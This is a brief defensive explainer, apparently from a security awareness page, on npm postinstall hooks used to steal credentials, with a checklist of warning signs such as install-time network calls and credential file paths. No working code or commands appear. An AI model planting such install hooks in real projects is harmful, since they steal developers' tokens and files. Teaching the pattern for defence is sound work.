npm Postinstall Credential Stealer
A package install hook runs before the app starts, giving malicious code a chance to read local files, tokens, or browser data.
How the pattern works
The attacker does not wait for npm run dev. They use package lifecycle scripts so code runs during dependency installation. That matters because many developers treat npm install as setup, not as executing someone else's program.
A malicious hook can collect local files, inspect environment variables, read browser profile paths, or download a second-stage script before the app ever opens.
Why it is effective
Install hooks blend into normal JavaScript workflows. Some legitimate projects use them for native builds or setup tasks, so the presence of a hook is not automatically malicious.
The signal becomes serious when the hook launches custom scripts, reaches out to the network, or touches files unrelated to dependency setup.
What to check
Before installing an unknown repo, read package.json and inspect every lifecycle script. Follow any local script it calls.
If you see install-time network calls, shell commands, obfuscated JavaScript, or credential-related file paths, stop and review in an isolated environment.